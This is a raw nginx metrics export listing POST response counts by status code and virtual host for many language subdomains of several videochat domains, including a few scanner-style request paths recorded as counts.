nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="zdchomr.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="zdkfdnl.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="zh.videochat.date"} 180 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="zh.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="zh.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="zh.videochat.tv.br"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="zh.videochat.world"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="400",vhost="-"} 832 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="400",vhost="/cgi-bin/admin/setparam.cgi"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="400",vhost="/cgi-bin/operator/servetest"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="400",vhost="/goform/websLogin"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="400",vhost="161.97.120.25"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="400",vhost="161.97.120.25:80"} 44 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="400",vhost="al.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="400",vhost="de.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="400",vhost="el.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="400",vhost="fi.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="400",vhost="is.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="400",vhost="mk.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="400",vhost="sw.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="14fc525b-13a8-40c3-8f05-01cd06b04453.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="161.97.120.25"} 3964 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="161.97.120.25:80"} 1159 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="43822297-98c3-4c96-b5b8-6a4c4675d440.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="8115dadb-0b6b-4cca-ac37-a5cf02c05ca9.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="8f76d726-154f-4e15-83cf-3f4903a60b07.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="aaexebs.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="account.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="admin.th.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="admin.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="af.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="af.videochat.date"} 63 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="af.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="af.videochat.show"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="af.videochat.tv.br"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="af.videochat.world"} 283 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="al.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="al.videochat.date"} 66 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="al.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="al.videochat.show"} 67 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="al.videochat.tv.br"} 38 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="al.videochat.world"} 272 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="am.videochat.cafe"} 95 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="am.videochat.date"} 61 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="am.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="am.videochat.show"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="am.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="am.videochat.world"} 381 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="api.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="app.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ar.videochat.cafe"} 275 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ar.videochat.date"} 65 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ar.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ar.videochat.show"} 205 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ar.videochat.tv.br"} 73 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ar.videochat.world"} 372 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="assets.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="auth.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="az.videochat.cafe"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="az.videochat.date"} 65 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="az.videochat.mx"} 44 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="az.videochat.show"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="az.videochat.tv.br"} 489 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="az.videochat.world"} 228 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="azecuhi.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ba.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ba.videochat.date"} 182 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ba.videochat.mx"} 61 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ba.videochat.show"} 68 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ba.videochat.tv.br"} 267 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ba.videochat.world"} 424 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="be.videochat.cafe"} 44 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="be.videochat.date"} 72 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="be.videochat.mx"} 303 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="be.videochat.show"} 64 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="be.videochat.tv.br"} 272 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="be.videochat.world"} 323 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="beta.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="bg.videochat.cafe"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="bg.videochat.date"} 182 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="bg.videochat.mx"} 146 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="bg.videochat.show"} 72 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="bg.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="bg.videochat.world"} 129 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="blog.id.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="blog.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="bn.videochat.cafe"} 61 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="bn.videochat.date"} 65 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="bn.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="bn.videochat.show"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="bn.videochat.tv.br"} 261 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="bn.videochat.world"} 205 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="bs.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="bs.videochat.date"} 65 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="bs.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="bs.videochat.show"} 70 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="bs.videochat.tv.br"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="bs.videochat.world"} 170 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="bwfzopl.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ca.videochat.cafe"} 44 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ca.videochat.date"} 57 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ca.videochat.mx"} 268 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ca.videochat.show"} 59 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ca.videochat.tv.br"} 262 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ca.videochat.world"} 197 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ceb.videochat.cafe"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ceb.videochat.date"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ceb.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ceb.videochat.show"} 55 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ceb.videochat.tv.br"} 218 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ceb.videochat.world"} 337 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="chm.videochat.cafe"} 63 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="chm.videochat.date"} 60 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="chm.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="chm.videochat.show"} 59 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="chm.videochat.tv.br"} 59 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="chm.videochat.world"} 298 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ckdbbet.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="cloijsk.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="cpanel.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="crm.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="cs.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="cs.videochat.date"} 232 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="cs.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="cs.videochat.show"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="cs.videochat.tv.br"} 74 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="cs.videochat.world"} 338 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="cy.videochat.cafe"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="cy.videochat.date"} 58 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="cy.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="cy.videochat.show"} 66 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="cy.videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="cy.videochat.world"} 283 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="cytjruk.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="czhdzka.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="da.videochat.cafe"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="da.videochat.date"} 141 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="da.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="da.videochat.show"} 116 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="da.videochat.tv.br"} 242 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="da.videochat.world"} 742 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="dashboard.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="database.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ddb00497-7d32-400e-85c8-bc34712fde6d.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="de.videochat.cafe"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="de.videochat.date"} 68 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="de.videochat.mx"} 270 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="de.videochat.show"} 68 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="de.videochat.tv.br"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="de.videochat.world"} 297 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="demo.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="dev.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ee.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ee.videochat.date"} 106 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ee.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ee.videochat.show"} 64 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ee.videochat.tv.br"} 396 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ee.videochat.world"} 326 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="el.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="el.videochat.date"} 67 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="el.videochat.mx"} 242 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="el.videochat.show"} 60 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="el.videochat.tv.br"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="el.videochat.world"} 145 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="elastic.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="en.videochat.cafe"} 65 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="en.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="en.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="en.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="eo.videochat.cafe"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="eo.videochat.date"} 61 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="eo.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="eo.videochat.show"} 71 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="eo.videochat.tv.br"} 317 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="eo.videochat.world"} 349 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="eojoxne.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="es.videochat.cafe"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="es.videochat.date"} 273 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="es.videochat.show"} 59 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="es.videochat.tv.br"} 391 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="es.videochat.world"} 257 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="esiityi.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="et.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="et.videochat.date"} 65 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="et.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="et.videochat.show"} 54 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="et.videochat.tv.br"} 60 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="et.videochat.world"} 626 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="eu.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="eu.videochat.date"} 58 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="eu.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="eu.videochat.show"} 74 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="eu.videochat.tv.br"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="eu.videochat.world"} 253 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="fa.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="fa.videochat.date"} 58 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="fa.videochat.mx"} 354 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="fa.videochat.tv.br"} 213 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="fa.videochat.world"} 308 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="fcflfis.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="fi.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="fi.videochat.date"} 215 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="fi.videochat.mx"} 250 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="fi.videochat.show"} 173 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="fi.videochat.tv.br"} 489 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="fi.videochat.world"} 247 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="forum.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="fr.videochat.cafe"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="fr.videochat.date"} 69 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="fr.videochat.mx"} 155 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="fr.videochat.show"} 75 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="fr.videochat.tv.br"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="fr.videochat.world"} 216 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ga.videochat.cafe"} 46 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ga.videochat.date"} 59 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ga.videochat.mx"} 39 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ga.videochat.show"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ga.videochat.tv.br"} 43 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ga.videochat.world"} 195 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="git.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="gl.videochat.cafe"} 63 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="gl.videochat.date"} 58 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="gl.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="gl.videochat.show"} 57 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="gl.videochat.tv.br"} 431 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="gl.videochat.world"} 333 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="gu.videochat.cafe"} 39 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="gu.videochat.date"} 70 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="gu.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="gu.videochat.show"} 67 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="gu.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="gu.videochat.world"} 294 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="he.videochat.cafe"} 49 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="he.videochat.date"} 138 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="he.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="he.videochat.show"} 64 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="he.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="he.videochat.world"} 242 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="help.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="hi.videochat.cafe"} 90 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="hi.videochat.date"} 101 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="hi.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="hi.videochat.show"} 69 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="hi.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="hi.videochat.world"} 222 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="hr.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="hr.videochat.date"} 206 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="hr.videochat.mx"} 160 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="hr.videochat.show"} 149 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="hr.videochat.tv.br"} 64 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="hr.videochat.world"} 233 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ht.videochat.cafe"} 79 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ht.videochat.date"} 58 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ht.videochat.mx"} 274 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ht.videochat.show"} 61 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ht.videochat.tv.br"} 108 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="ht.videochat.world"} 77 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="hu.videochat.cafe"} 201 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="hu.videochat.date"} 126 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="hu.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="hu.videochat.show"} 66 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="hu.videochat.tv.br"} 60 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="hu.videochat.world"} 470 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="huvcgmi.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="iclgzbs.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="id.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="id.videochat.date"} 63 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="id.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="id.videochat.show"} 64 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="id.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="id.videochat.world"} 413 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="internal.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="is.videochat.cafe"} 99 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="is.videochat.date"} 71 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="is.videochat.mx"} 158 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="is.videochat.show"} 65 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="is.videochat.tv.br"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="is.videochat.world"} 796 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="it.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="404",vhost="it.videochat.date"} 195 